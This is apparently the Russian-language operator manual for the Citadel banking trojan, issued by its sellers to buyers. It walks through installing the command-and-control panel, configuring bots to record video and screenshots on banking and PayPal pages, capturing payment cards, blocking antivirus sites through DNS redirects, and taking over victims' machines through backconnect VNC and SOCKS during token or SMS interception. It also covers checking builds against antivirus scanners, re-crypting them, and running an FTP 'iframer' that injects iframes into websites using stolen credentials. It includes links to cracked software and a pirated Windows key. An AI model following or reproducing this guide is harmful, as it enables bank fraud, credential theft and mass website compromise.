С нами такая проблема не актуальна. Специально для вас была разработана система, благодаря которой, вы можете незамедлительно сообщить о баге в софте, а мы в свою очередь оперативно его пофиксим, если таковой имеется. Все запросы поступают нескольким людям одновременно, с уведомлениями по jabber/sms. Вы довольно быстро получите ответ внутри тикет-системы.
У вас возникла замечательная идея для доработки софта и вы хотите ею поделиться с разработчиком (пусть это даже самая маленькая идея: к примеру вам не нравится иконка в меню) - мы идем вам навстречу.
Вы можете создать 2 вида заявок(читайте-проектов) внутри CRM:
а) публичная заявка - это заявка с темой + описанием(лучше прикладывать ТЗ), которую будут видеть все клиенты, они могут ее обсудить в комментариях, предложить свою цену за реализацию и голосовать: нужна ли эта заявка или отправляем ее в треш.
Вы можете создавать данные виды заявок, а можете голосовать и делать любые действия относительно других заявок наших клиентов.
б) приватная заявка - если вы хотите предложить нашим разработчикам индвидуальную задачу и хорошую цену за реализацию, то этот вид заявки для вас. Его может видеть только разработчики(т.е мы) и вы. Если все условия устраивают обе стороны, данный модуль получаете только вы.
Все актуальные заявки, вы можете видеть в разделе "На обсуждении"
Право голоса имеет 4 значения:
Нужен, я приобретаю
Полезен, но мне не нужен
Абсолютно не нужен
Не нужен, я не приобретаю
Пожалуйста, если вы увидели новую заявку - проголосуйте за нее, даже если она вам вообще не нужна! У нас очень узкий круг, поэтому именно ВАШЕ мнение является решаюшим для ВСЕХ, не оставайтесь в стороне.
О любых событиях внутри CRM(решения, заявки, комментарии) вы будете уведомлены ботом по jabber-каналу. Это сделано для вашего удобства, чтобы вам не рефрешить каждый раз страницу. Но все равно, полезно заходить раз в 3 дня в СRM'ку =) Чем быстрее идут голоса и мнения - тем оперативнее развивается наш продукт.
Если заявка набирает много отказных голосов, она идет в раздел "Отклоненные заявки" и закрывается.
Если заявка одобряется разработчиками, она идет в раздел "В разработке"
По каждой заявке в этом разделе, мы вносим изменения в формате: дата - что сделано
Чтобы вы видели процесс работы над модулем.
Не забудьте указать желаемую объявленную цену на модуль, за которую вы бы оценили доработку.
Все новости мы публикуем в разделе "Новости", если вам не приходят уведомления в Jabber, пожалуйста, немедленно сообщите об этом в саппорт!
Заходите раз в 3-4 дня в СРМ и проверяйте новости и комментарии к заявкам.
2) Список полезных ссылок, которые помогут вам:
1) VMWare Workstation 6.5.0 + VMWare Tools + Crack:
http://www.citadelmovement.com/software/VMware-workstation-6.5.0-118166.exe
2) Образ англоязычной Windows XP SP3 (Corporate Edition):
http://www.citadelmovement.com/software/Microsoft_C2AE_Windows_XP_SP3_Corporate.iso
Key: MXDJT-W3TCG-2KGQH-YPMK3-F6CDG
3) Комплект разработчика для создания инжектов + примеры (автор неизвестен):
http://www.citadelmovement.com/software/injects_development.zip
3) Установка Citadel
Папки:
builder - комплект билдера
backconnect - софт для BackConnect VNC админки, а именно php скрипты для Backconnect Windows сервера.
webserver(Либо server[php] - админка, гейт
********************************************************************************
==========================>>>>> Step-By-Step установка Citadel
********************************************************************************
********************
>>>>>>>>>> Требования к серверу.
********************
PHP >5.3, Mysql 5 (желательно последняя версия)
cron, apache. По желанию nginx и панель управления cPanel или DirectAdmin.
+ Windows VPS если приобретали VNC админку (о модуле чуть ниже)
********************
>>>>>>>>>> Шаг 1
********************
При запуске builder.exe, будет строчка
Ключ авторизации: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Это ваш индвидуальный ключ для защиты от трекеров (мы его называем еще LOGIN KEY)
Его нужно поместить в файл webserver/system/global.php, в котором содержится строчка
define('BO_LOGIN_KEY', 'PUT_KEY_HERE');
Вставляем этот ключ сюда, т.е получается
define('BO_LOGIN_KEY', 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');
ОЧЕНЬ ВНИМАТЕЛЬНО ЭТОТ МОМЕНТ ПРОВЕРЯЕМ!!! В 80% СЛУЧАЕВ КЛИЕНТЫ ПРОСТО ЗАБЫВАЮТ ВПИСАТЬ СЮДА СВОЙ КЛЮЧ ИЗ БИЛДЕРА В GLOBAL.PHP И ПОЭТОМУ БОТ НЕ СТУЧИТ В АДМИНКУ. ПРОВЕРЯЕМ ЭТОТ МОМЕНТ ВНИМАТЕЛЬНО!! ЕСЛИ КЛЮЧ УЖЕ ВПИСАН, ЗНАЧИТ ВСЕ ХОРОШО.
Потом ставим chmod 777 на папку:
system
system/data
Также, необходимо поставить перед установкой chmod 777 на всю папку webserver, после полной установки - вернуть права папки на chmod 755
После этих проделанных действий, открываем файлик webserver/api.php
и меняем строчку define('API_TOKEN_KEY', 'changethispassword');
на любой произвольный пароль, к примеру define('API_TOKEN_KEY', 'dgwd23gwegw');
Это нужно чтоб вы были защищены от взлома и вас не скомпрометировали через скрипт API, поменяйте дефлотовый пароль.
********************
>>>>>>>>>> Шаг 2
********************
Идем на http://www.htaccesstools.com/htpasswd-generator/
Вводим любое имя-пароль, выдается строчка типа a:$apr1$HE/llFvK$u3YAEGm277SkotywpTl9w/
Сохраняем эту строчку в файл .htpasswd в директории webserver
После чего создаем новый файл .htaccess в директории webserver
Туда пишем:
<Files cp.php>
AuthName "Your ID"
AuthType Basic
AuthUserFile /put/do/faila/.htpasswd
require valid-user
</Files>
Где /put/do/faila/.htpasswd - заменяем на свой конечный unix-путь.
Теперь при заходе на админку cp.php, будет дополнительная защита по паре логин-пароль.
Можно сделать по-другому и не создавать .htpasswd, а просто создать файл .htaccess и вписать туда строчки:
<Files cp.php>
Order Deny,Allow
Deny from all
Allow from 111.111.106.111
</Files>
Где 111.111.106.111 - ваш постоянный IP, теперь админка будет доступна только с вашего IP.
Какой из способов вам удобнее - выбирать вам.
********************
>>>>>>>>>> Шаг 3
********************
Откроем файл config.txt и рассмотрим НОВЫЕ настройки, старые настройки унаследованные от зевса остались неизменными, поэтому не будем заострять на них внимание.
entry "Video"
quality 1
length 60
end
Секция для настроек видеограббера: length длина каждого видео в секундах, рекомендуется указывать не более 10 минут (600 секунд) т.к образуются весьма увесистые файлы.
Quality - от 1 до 5, качество видео. Рекомендуется оставить 1 по умолчанию, чтобы сэкономить на размере видео файлов.
Видео запись срабатывает при заходе на нужный нам линк и снимается ровно length-секунд.
Чтобы задать нужные нам маски для съемки, переходим в раздел entry "WebFilters"
"#*paypal.com/*"
символ # перед маской является активацией съемки.
Секция очень тонкая, потому что довольно сильно нагружает сервер, указывайте как можно точную маску и только на очень нужные вам ссылки(к примеру банк.акки)
Рекомендуется настроить сервер apache & php - для приема файлов более 50 MB через POST.
Руководство по настройке сервера лежит здесь# http://jdownloads.ru/faq/8-how-uploadbigfiles.html
Тестируйте внимательно съемку видео НЕ на виртуальних машинах, т.к в связи с отсутствием нужных кодеков, может быть такое, что на виртуалках не будет сниматься видео.
Видео складываются в формате .webm, в папку _reports/*BOTNAME*/videos/
Их можно найти через поиск файлов в админке, либо просмотреть через онлайн плеер (раздел "Просмотр Видео"). Рекомендуется просматривать в браузере Opera и Firefox, остальные браузеры не тестировались.
entry "CmdList"
"hostname"
"net view"
"ipconfig /all"
end
Список системных команд, который бот исполнит при первом запуске 1 раз на системе и пошлет в админку.
В админке, можно найти результат команд как тип отчета "Результат CMD-команды"
С ним будет список: бот - результат выполнения команды
в удобном формате (Раздел CMD-Парсер)
encryption_key "key"
Обязательно здесь задаем свой произвольный ключ, это RC4 ключ он же Encryption Key - вы его задаете при установке админки в инсталлере, поменять его можно в разделе Параметры. Он должен быть не слишком сложный и не слишком простой, совпадать в конфиге и в админке. НЕ РЕКОМЕНДУЕТСЯ СТАВИТЬ БОЛЕЕ 10 СИМВОЛОВ! ЖЕЛАТЕЛЬНО ИСПОЛЬЗОВАТЬ НИЖНИЙ РЕГИСТР И БЕЗ СПЕЦСИМВОЛОВ!
entry "DnsFilters"
"microsoft.com=127.0.0.1"
"myspace.com=127.0.0.1"
"gruposantander.es=127.0.0.1"
end
Возможность создать DNS-редирект или заблокировать AV-сервер или нежелательный урл(например, если вы обнаружили, что в логах загрузки идут еще кому-то и нужно заблокировать чей-то гейт).
Указывается IP-адрес для редиректа.
ДНС Редирект работает не только для браузеров, а для всего софта, который будет стучаться на данный домен. Все эти запросы будут перенаправлены на ваш IP.
Теперь важно!!! Полученный БИЛД конфига, ехе файл и файл видео.модуля (чтобы создать его, нужно нажать кнопку Собрать модули), мы кладем в папку webserver/files/
В итоге у нас получается 3 файла в папке files. Конфиг, видео.модуль, ехе-файл. Не забудьте закриптовать ехе-файл перед тем как поместить его в папку, иначе будет такое, что по таймеру автообновления, боты начнут скачивать ехе, который палится.
url_config1 "http://localhost/file.php|file=test_config.bin"
Указываем здесь test_config.bin - название нашего конфига, который мы залили в files/ с учетом того, где лежит файл file.php (а лежит он выше папки files). Символ | вас не должен смущать, он тут специально.
url_config1 указывать обязательно, можно также вписать несколько резервных конфиг-урлов, на случай если первый домен пока вы спите ушел в даун, т.к боты не дойдут до вашего конфига, если не смогут скачать основной конфиг.
В этом случае пишем еще одну строчку под url_config1:
url_config2 "http://localhost/file.php|file=test_config.bin"
Указывать не обязательно. Но таких можно указывать до 20 резервных конфигов, бот поочередно будет стучаться на каждый из урлов пока не установит себе конфиг-файл. На самый последний url_config бот стучит с задержкой, через 5 часов, это сделано для защиты от автоматического парсинга урлов реверсерами.
url_loader "http://localhost/file.php|file=test_bot.exe"
test_bot.exe - здесь указываем название ехе-файла, который лежит в папке files/
Файл file.php не переименовываем, оставляем с таким же именем. Путь дo file.php, папка files/ лежит рядом с файлом.
url_server "http://localhost/gate.php"
Здесь указываем путь до gate.php
Остальное настраивается как зевс, если забыли формат, читайте мануал от зевса zeus_old.txt
С появлением 1.3.0.0 версии появлась необходимость собирать модули (например видеограббер) для билда, т.к боты будут выкачивать необходимые модули с вашего сервера.
Поэтому после того как собрали ехе, жмем кнопку "Создать модули" и закачиваем получившийся файл/файлы в папку webserver\files на сервере. ЭТО ПРОДЕЛЫВАТЬ ОБЯЗАТЕЛЬНО! ДАЖЕ ЕСЛИ ВЫ НЕ ИСПОЛЬЗУЕТЕ ВИДЕО.МОДУЛЬ! ИНАЧЕ БОТ НЕ БУДЕТ СТУЧАТЬ В АДМИНКУ.
После того, как мы закачали файлы в files и залили всю папку в целом webserver + создали БД.
Идем по адресу: http://www.vash-host.com/citadel/install
И вписываем все значения, после чего удаляем каталог install.
********************************************************************************
==========================>>>>> Установка BackConnect Windows сервера (необходимо для функционирования VNC-админки)
********************************************************************************
Для установки серверной части, нужен Windows VPS/Dedicated желательно XP,2003,2008
Ставим веб-сервер XAMPP/WAMP, либо любой другой с поддержкой PHP. Отключаем UAC+Windows Firewall, чтобы можно было открывать порты. А также отключим политику доменов и выйдем полностью из любого домена.
Заливаем в веб-директорию комплект скриптов backconnect\winserv_php_gate
Веб-админка будет по адресу: http://ip-serv/control.html
В ней будет лог по VNC коннектам.
Возможные проблемы: из-за виндового фаерволла, проверьте этот момент очень внимательно. Не забудьте перезагрузить Windows после отключения фаерволла.
Все скрипты должны лежать в корне на сервере, никаких папок не создавать.
Если не знаете как поставить XAMPP, вот мануал: http://www.ripecms.com/documentation/articles/installing-apache-php
********************************************************************************
==========================>>>>> Установка Citadel VNC Admin
********************************************************************************
Если вы приобрели модуль VNC-админки, то в вашей панели будет доступен раздел "VNC".
Пробежимся по опциям, с которыми могут возникнуть трудности.
Для начала работы нужно нажать "Конфигурация" и вписать туда IP-адрес Windows-сервера, куда вы уже залили скрипты backconnect'a. Никаких путей не надо, просто IP-адрес.
Чем отличается коннект от автоконнект?
Если вы задаете коннект какому-то боту, то он разово выполнит эту команду и ыышлет вам данные для подключения. Если вы задаете автоконнект, то бот будет инициировать соединение с backconnect-сервером каждый раз, как только он выходит в интернет. Опция применима как к Backconnect Socks, так и к VNC.
Теперь зададим URL-маски, которые мы будем отлавливать в нашу VNC админку.
Маска URL: здесь указываем URL по схеме *mail.ru* или http://*.bank.com* (можно играться как угодно, звездочка вам в помощь)
Параметры: Здесь указываем названия POST-переменных, которые находятся на форме сайта, который мы ловим. На примере mail.ru, это будет Login* и Password*
Формат параметров простой, можно указать "login=", можно указать "login*", или просто "login". Поэтому выбирайте как вам удобнее, не забудьте протестировать маску.
Параметры не чувствительны к регистру.
Уведомлять в Jabber?: ставим опцию, если хотим чтобы каждый новый отловленный акк, приходил вам. Jabber задается в настройках, можно указать несколько через запятую.
ВАЖНО! Чтобы в разделе "Параметры" были вписаны данные Jabber-бота(Использовать исключительно Jabber.org), с которого все это будет идти к вам.
Также, есть возможность создания Автоконнекта с ботом, от которого пришел новый аккаунт в раздел. Т.е в жабер вам сразу приходит аккаунт + порт для коннекта на VNC/SOCKS.
Не забывайте, что работает контекстное меню напротив ботов, линков и т.п через правую кнопку мыши: можно удалить какие-то ненужные акки(отправить в мусор), пометить как Избранное или включить/отключить нужные настройки.
Строчка 2 ботов, 6 аккаунтов, 5 живых аккаунтов (83%) расчитывает % живых аккаунтов по принципу если бот не появлялся в сети более 4 дней, аккаунт считается мертвым.
Также, существует API для быстрого создания VNC/SOCKS соединения с нужным ботом, например во время перехвата токена или смс, вам нужно срочно зайти на акк под холдером, вы инжектом через javascript/iframe вызываете URL до api.php
* VNCController
* api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=VNC
* api.php/<token>/vnc/connect?botIP=1.2.3.4&protocol=SOCKS
* api.php/<token>/vnc/connect?botId=WIN-ABC123&protocol=VNC
*/
define('API_TOKEN_KEY', 'changethispassword');
И передаете IP или BotID, скрипт дает команду на установку соединения боту и данные приходят вам в жаббер. Тайминг зависит от параметра timer_stats в конфиге билдера.
Вот вам совет по работе с ботами на Win7/Vista: используйте Firefox portable для Win7/Vista - он работает корректно. Не забываем отключать wallpaper чтобы не гонять много трафика. Также, чтобы попасть в одну из директорий - нажимаем свойства ярлыка.
********************************************************************************
==========================>>>>> Установка модуля чекинга веб-соксов
********************************************************************************
Раздел "SOCKS" в админке - ничего настраивать не нужно.
********************************************************************************
==========================>>>>> Установка модуля парсера логов
********************************************************************************
С версии 1.3.3.3 модуль доступен из админки, раздел "ссылки", сложностей возникнуть не должно.
********************************************************************************
==========================>>>>> Работа с крипт-панелью
********************************************************************************
Существует раздел "crypt exe" он же "крипт ехе" и отображается он в основной админке Citadel. Если его нету, то читайте ниже как его активировать.
Он нужен для того, чтобы вы могли предоставить доступ вашему криптеру и он переодически перезаливал ехе-файл, который боты обновляют.
При этом, криптер не имеет доступа к остальным частям админки, для него доступен только этот раздел.
Для начала, активируем этот раздел у себя, для этого перейдем в раздел "Users", нажмем на свой логин и ниже отобразится список опций, доступный нам. Отмечаем галочками 2 пункта:
r_svc_crypter_crypt - Этот пункт дает привилегии перезаливать ехе файл.
r_svc_crypter_pay - Этот пункт дает привилегии вести таблицу оплат по перезаливкам.
Далее создаем нового пользователя и даем ему ТОЛЬКО "r_svc_crypter_crypt" права, передаем логин-пароль криптеру и он может через форму перезаливать ехе-файлы из папки files/
Не забудьте предварительно поставить chmod 777 на эту папку и доверять доступ только доверенным лицам.
Теперь, как только криптер перезаливает ехе-файл, появляется новая запись в таблице что данный ехе-файл не оплачен, вы же в свою очередь проверив все ли ок, помечаете у себя в админке что крипт Х такого-то числа оплачен.
Можно вписать данные для Jabber-уведомления по проверке scan4you в этом же разделе.
********************************************************************************
==========================>>>>> Установка системы редиректов (прокладка для конфига)
********************************************************************************
Генерация прокладок (file.php) для защиты конфигов (полноценная система редиректов) BETA-версия.
Генератор прокладок решает проблему переноса file.php на отдельный хост, который вы можете юзать как редирект-прокладку до вашего основного файла конфига и ехе.
Генерация прокладки осуществляет через билдер, для этого добавлена кнопка "Собрать прокладку".
На выходе получаем 2 файла, file.php, file_config.php (имя указанное в диалоговом окне при сохранении игнорируется(!)).
ВНИМАНИЕ: file_config.php содержит ваш encryption key в преобразованном виде, он берется из вашего конфига, поэтому при генерации гейта конфиг должен быть настроенным и валидным,
Теперь загружаем файлы file_config,php, file.php на прокладку и создаем там же папку files, куда помещаем exe, config + video module файлы.
Для запрета прямого доступа к файлам в папке files создаем файл .htaccess следующего содержания:
deny from all
В настройках конфига задаем url_config1, url_loader до прокладки.
Если хотите защитить гейт и создать для него прокладку, есть файлик other/redir.php, открываем его и прописываем путь до РЕАЛЬНОГО гейта
//URL оригинального сервера.
$url = "http://localhost/s.php";
После чего сохраняем срипт под любым именем и указываем в конфиге бота путь в качестве гейта (url_server)
!Важно! Чтобы на хосте были разрешены сокеты в PHP, иначе работать не будет.
Проверить это можно создав файл 1.php с <?php phpinfo(); ?>
Он должен показывать Sockets Support enabled
Прокладки на данный момент не передают видео и скриншоты, только логи. Это единственный минус.!!
********************************************************************************
==========================>>>>> Краткий мануал по новым фичам
********************************************************************************
1) В админке появилась новая секция "Эффективность и Безопасность", мы провели интеграцию с сервисом scan4you, и теперь вы можете одним кликом проверить все ваши ехе-билды на палевность сразу в админке Citadel, также, вы можете установить автоматическую проверку файлов раз в сутки, и если один из ваших файлов палится более чем 3я антивирусами, вы немедленно получите уведомление в ваш Jabber, чтобы вы могли
сразу заменить ехе. Теперь механизм будет работать за вас автоматически, ленитесь на здоровье!
=> Для начала нажмем кнопку Настройки: впишем туда Scan4you Profile ID(ИМЕННO ID, А НЕ ЛОГИН!!), Scan4you API Token, Jabber для уведомлений. Взять эти данные можно в настройках профиля scan4you.net
Потом идете в раздел ПАРАМЕТРЫ и вписываете данные Jabber-бота (предварительно зарегав аккаунт для бота), рекомендуется юзать jabber.org
Все готово.
2) Некоторые клиенты жаловались на то, что лишь 40% ботов обновляется на новую версию ехе, остальные не могут обновиться по какой-то неизвестной причине. Действительно, баг остался еще со времен зевса, мы его исследовали и исправили. Теперь введен новый параметр в конфиге: timer_autoupdate 8
В котором задается время (в часах), как часто скачивать и перезапускать exe с сервера (RC4 encryption_key ключ должен совпадать). 80% ботов теперь обновляются успешно, криптуйте и перезаливайте ехе, живучесть повысилась на 45%, ваши боты будут иметь самый свежий и чистый билд.
=> Путь до ехе-файла берется из секции "url_loader", соответственно чем чаще вы перезаливаете чистый ехе, тем чище ехе-файл имеют ваши боты у себя. Они его скачивают и перезапускают, обновляя себя.
4) Формат видео от ботов изменен на .webm(HTML5), мы встроили онлайн видео плеер в админку Citadel, теперь вы можете смотреть видео прямо в вашем брауезере(рекомендуется Opera). Из возможностей: перемотка назад-вперед/фулл-скрин/поиск видео по BotID,IP-адресу,дате.
Но этого мало и мы пошли дальше, многие из вас используют(пора уже всем использовать и разрабатывать индустрию совместно) АЗ и персональные админки для инжектов/сбора акков и т.п. Вы бы хотели из вашей админки смотреть видео по заливу или как работает ваш инжект на боте? Легко! Мы создали API-систему, теперь вы можете передать BotID или IP-адрес скрипту, а API вернет вам готовый HTML-embed код всех видео по данному боту и вы можете вставить и смотреть видео хоть на narod.ru, не заходя в админку Citadel.
=> Это все можете вы увидеть в разделе онлайн-плеер, разберетесь сами там все просто.
=> Мануал по экспортеру видео-файлов для админок АЗ на основе онлайн-плеера.
Запросы такого вида:
/api.php/megakey/video/list.php?botnet=COOL&botIP=111.111.111.111
/api.php/megakey/video/list.php?botnet=COOL&botId=017_B4DF7611E03FF4C8
в ответ выдают php-массивы или JSON
Формат запросов:
api.php/<security-token>/video/<action>[.<extension>]?<params>
<security-token> параметр-ключ, который вы задаете в скрипте api.php и он нужен для авторизации на сервере.
<action> — команда
<extension> — (опционально) расширение: формат вывода. Если опустить — виден дебаг-вывод. Возвожные значения: .dump, .php, .json, .xml
<params> — параметры функции контроллера (можно посмотреть в коде)
Примеры запросов:
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botIP=1.2.3.4
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123&embed=1
http://citadelhost.ru/folder/api.php/ahro4uNg/video/embed?botnet=COOL&botId=WIN-ABC123&video=balakhan.webm
Параметр botnet не обязателен.
citadelhost.ru/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
И еще: подставив расширение — можно получить желаемый формат:
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list.php?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list.json?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list.xml?botnet=COOL&botId=SURAKSHYA-PC_775A658D6522DF69
добавив параметр &embed=1 можно получить сразу HTML-код вставки для всех видеофайлов, но не рекомендую: их может быть много) там для этого отдельная функция есть.
Пример без передачи имени ботнета:
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost.ru/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69&embed=1
5) Добавлен удобный анализатор-парсер системных команд (CMDList) в админку, теперь вы можете посмотреть в новом формате в виде таблицы, результаты выполнения системных команд, таких как: ipconfig, список ПК в локальной сети, список процессов и т.п.
=> Увидите отдельный раздел "CMD Парсер".
6) Теперь при установке билда на бота, автоматически единоразово присылается в админку cледущая информация: установленные фаерволлы, установленные антивирусы, установленные программы.
Вы можете посмотреть информацию как для отдельного бота, так и для всего ботнета. Мы создали отдельный раздел, в котором вы можете посмотреть всю статистику в виде наглядного графика и подсчетов. Теперь вы знаете с кем бороться.
=> Раздел "Установленный Софт", если вы видите в графиках много "Unknown" значит на боте не стоит антивируса или фаерволла. Также, нажав поиск отчетов по боту, вы увидите новый вид отчета.
7) Добавлена возможность "Избранных логов", вы можете пометить любой интересный аккаунт(отчет) при поиске данных в админке, а потом без труда найти его т.к он будет выделен отдельным цветом в разделе "Избранные отчеты"
=> Новые параметры в конфиг-файле.
enable_luhn10_get 1
enable_luhn10_post 1
GET LUHN10 - анализирует данные в GET-запросах и WinSocket/Wininet на предмет карт и дампов, по алгоритму en.wikipedia.org/wiki/Luhn_algorithm
POST LUHN10 - анализирует POST данные в https:// запросах.
Чтобы найти карты, выберите тип отчета: "LUHN10 запрос" в разделе "Поиск в базе данных".
8) Работа с API.php. Через API можно выдернуть ftp-аккунты для вашего ифреймера.
* IFramerController:
* api.php/<token>/iframer/ftpList
* api.php/<token>/iframer/ftpList?state=all
* api.php/<token>/iframer/ftpList?date_from=2012-12-31
* api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all
* api.php/<token>/iframer/ftpList?date_from=2012-12-31&state=all&plaintext=1
За остальными примерами работы с API, смотрите в комментариях к скрипту api.php
********************************************************************************
==========================>>>>> Как обновлять админку и бота на следущие версии Citadel
********************************************************************************
Перезалейте и перезапишите все скрипты на сервере и зайдите в папку /install/, нажав кнопку Update - ждите пока ваши таблицы обновятся, это может занять долгое время.
Если у вас слишком забита БД, вам имеет смысл поставить админку заново в новую папку и перебросить на нее ботов командой user_execute http://www.host.com/newcitadel.exe
Обратите внимание, формат конфига с каждой новой версией может меняться, поэтому для того чтобы все работало корректно, настройте НОВЫЙ(идущий в архиве с версией) конфиг под ваши параметры и перезалейте его в папку files, вместе с exe-файлом и видео-модулем (ОБЯЗАТЕЛЬНО). Обращайте внимание на новые появившиеся опции в конфиг-файле, который мы даем вместе с билдером.
После чего, для того, чтобы ваши боты обновились на новую версию, дайте команду user_execute http://www.temphost.com/newcitadel.exe
Проверьте, что ехе доступен с веба по данному линку.
Enjoy.
********************************************************************************
==========================>>>>> Описание дополнительных опций в конфиге билдере
********************************************************************************
disable_cookies 1/0 - Если стоит 1, cookies не будут присылаться вам в админку.
disable_antivirus 1/0 - Если стоит 1, модуль MiniAV будет выключен.
enable_luhn10_get 1 - Модуль CardSwipe, если стоит 1, будет перехватывать карты/дампы в GET запросе.
enable_luhn10_post 1 - Модуль CardSwipe, если стоит 1, будет перехватывать карты/дампы в POST запросе.
remove_certs 1 - Если стоит 1, сертификаты слаться не будут.
timer_autoupdate 8 - Время в часах, автообновления ехе из папки files/. Иначе говоря через сколько часов, скачивать и запускать ехе каждый раз.
disable_httpgrabber 1 - Если стоит 1, отключается граббер HTTP отчетов в Google Chrome(только в нем)
report_software 1 - Если стоит 1, отсылать информацию о фаерволле/антивирусе/софте в админку.
Секция entry "WebFilters"
Для активации скриншотов, вставляем мачку "@*paypal.com/*"
Если нужны скриншоты полного экрана, то "@@*paypal.com/*"
Для активации видео-записи, "#*paypal.com/*"
entry "WebFakes" - ВЕБФЕЙКИ НЕ РАБОТАЮТ!!
********************************************************************************
==========================>>>>> FTP-ифреймер. Характеристика
********************************************************************************
A) Скрипт ифреймера
Заливается на левый сайт и используется как "прокладка": осуществляет всю работу. Нажмите "Скачать скрипт" и залейте его по фтп на какой-нибудь левый хост.
Им управляет специальный crontask из вашей админки.
Возможности отладки:
* Создать рядом со скриптом папку iframer/ доступную на запись. Туда он может сохранять предпросмотр ифрейминга файлов.
* Создать рядом со скриптом файл 'iframer.php.log' (имя скрипта с расширением + .log): он туда автоматически начнёт писать логи действий, найденные папки, ...
* Не забудьте выставить права 666,777 если хотите отладку сделать.
Скачать его можно на странице ифреймера в панельке: [download].
Физически он лежит в system/utils/. Здесь он напрямую не вызывается, просто хранится :)
Сам ифреймер для работы не требует никаких файлов и прав записи: он аккуратно использует PHP-сессии для хранения даннях.
B) Конфигурация
Позволяет задать:
* URL скрипта-ифреймера для запуска.
* HTML-код для вставки
* Режим действия. 'off' выключен, 'inject' вставлять HTML-код, 'preview' предпросмотр без изменения файлов на FTP: сохранять проифреймленные файлы в папку 'iframed/' рядом со скриптом (если она существует и доступна на запись)
* Метод инъекции: умный(не повреждает PHP/JS/ASP файлы) , запись в конец, перезапись
* Глубина обхода папок (уровни от 1 до 50)
* Маски для файлов и папок.
Файл ифреймится только в том случае если и папка, и файл подошли к одной из масок.
Если папка совпала с маской — глубина обхода увеличивается (на случай глубоко заложенного public_html)
C) Принцип работы клиентской части
Во-первых, перед каждой фазой общения панельки с ифреймером последний проходит самотестирование: все ли жизненноважные для работы функции включены, предсказуемо ли ведёт себя сервер, .... Если selftest не выполнен — никакая работа выполняться не будет.
Один cronjob раз в 10 минут собирает новые ftp-аккаунты из базы и создаёт задания. Повторные ftp-акки не допускаются.
Эти аккаунты постятся на скрипт-ифреймер и добавляются к списку "заданий" вне зависимости от того запущен он сейчас или нет.
Другой cronjob также выполняется раз в 10 минут. Он просто запускает скрипт-ифреймер: если он всё ещё работает — ничего не происходит, однако если он там сдох (например, time limit) — будет произведён перезапуск. Порог перезапуска 120сек
И, наконец, последний cronjob: он каждую минуту спрашивает ифреймер как у него там дела: сколько заданий выполняется, сколько в очереди, сколько готово. Если есть аккаунты с которыми он уже закончил — они вытаскиваются и сохраняются. На ифреймере эти акки удаляются для экономии памяти.
Во избежание возможных ошибок вся передача данных двухэтапная: запрос, ответ, запрос-подтверждение, действие.
Если в течение суток по аккаунту нет результатов — он отправляется снова.
D) Принцип работы самого ифреймера
В начале скрипта указан список игнорируемых расширений файлов. Они не изменяются даже если подошли к одной из масок.
Ифреймер хранит данные в сессии: они включены на всех хостингах и нет нужды играться с правами или искать папку доступную для записи :) Написан с учётом возможной работы даже под PHP4 (это надо проверить при случае).
Ифреймер умеет правильно перезапускаться и дохнуть по timelimit'у: никакие важные данные не потеряются, он сможет продолжить с места остановки.
При разрыве подключения ифреймер умеет реконнектиться при следующем запуске.
Фазы работы:
1. Попытка коннекта. Если она не удаётся 3 раза подряд — акк отмечается как невалидный.
Если много акков к которым не удаётся подключиться — ифреймер может "подвисать" сгребая таймауты. Это нормально: он пытается :)
2. Попытка аутентификации. Если не удаётся — акк невалидный.
3. Листинг всех папок и файлов до указанной глубины. Выборка файлов и папок подходящих по маске указанной в админке. Для подошедших папок глубина обхода увеличивается.
4. Фаза ифрейминга. Замечу, что в режиме 'preview' файлы на FTP не изменяются!
Для каждого файла определяется его тип (по расширению), что определяет метод ифрейминга. Поддерживаются: html, php, CSS, JS, asp (и эквивалентные расширения)
К коду ифрейма добавляется специальный маркер для избежания случайного повторного ифрейминга файла.
В режиме smart код добавляется в начало php-файла, однако сам ифрейм выводится в конце :)
В режиме append код добавляется в конец файлов. Умно определяется синтаксис чтобы не сломать код. JS-файлы заражаются через внедрение кода рисующего iframe.
* На всех этапах собирается статистика, список изменённых файлов.
Ифреймером управляют два задания:
* "запуск" отрабатывает автоматом каждые 10 минут: он постит новые аккаунты и включает долгий процесс их проверки.
* "сбор" — каждую минуту, забирает что готово
E) Интерфейс
Показывает состояние ифреймера (на самом деле, состояние cron-задач). Можно вручную дёрнуть задание чтобы обновить информацию.
Показывает список аккаунтов. Для каждого: Состояние, ошибки, список страниц (по клику), статистика (по клику).
Невалидные аккаунты удаляются через сутки: повисели и пропали.
*) Принцип работы заданий и ифреймера на пальцах:
Задание "запуск": раз в 10 минут
Получить несколько новых акков и дописать их в конец списка задач.
Дальше ифреймер проходит по списку задач (аккаунтов)
Берём 1й акк. Коннектим. Не получилось в течение 10сек? Отложим, перепроверим.
Берём 2й. Подключилось! Авторизация зато не удалась. С этим закончили, он невалидный.
Берём 3й. Не коннектит. Тоже перепроверим.
Берём 4й. Подключились. Авторизовались. Парсим.. ифреймим.. закончили, он валидный.
Задание "сбор":
оно в ЛЮБОЙ момент может подключиться и выхватить промежуточные результаты) Здесь это 2й и 4й, если они успели отработать.
Когда 1й и 3й акк словят ещё несколько дисконнектов — они тоже будут отмечены как невалидные.
Добавленные позднее фичи:
- Режим "check only". Говорит за себя
- Опция: реифрейминг аккаунтов спустя N дней. Каждый аккаунт спустя N дней будет обработан заново.
- Замена старого ифрейм-кода новым. Если изменился HTML-код — он не тупо добавится а заменит собой старый :)
- Опция "ифреймить только вчерашние акки". Даст сутки на то чтобы игноры расставить)
- Логирование ошибок ифреймера (!)
